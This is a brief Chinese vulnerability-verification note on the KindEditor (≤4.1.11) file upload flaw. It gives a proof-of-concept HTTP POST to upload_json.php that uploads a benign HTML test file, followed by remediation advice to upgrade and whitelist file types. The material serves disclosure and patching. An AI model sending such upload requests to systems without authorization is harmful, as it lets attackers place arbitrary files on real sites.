漏洞验证-KindEditor 文件上传
一、漏洞描述
漏洞存在于KindEditor编辑器小于等于4.1.11版本中,支持php/asp/jsp/asp.net,可上传.html等文件类型
二、验证POC
POST /data/kindeditor/php/upload_json.php?dir=file HTTP/2
Host: XXXX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko
Accept: */*
Accept-Encoding: gzip,deflate
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------114782935826962
Content-Length: 216
-----------------------------114782935826962
Content-Disposition: form-data; name="imgFile"; filename="test4upload.html"
Content-Type: text/plain
Test 2025-09-09
-----------------------------114782935826962--
三、验证截图

四、整改建议
[1]建议升级到4.1.11以上版本。 [2]建议使用白名单,限制脚本文件的上传。
浙公网安备 33010602011771号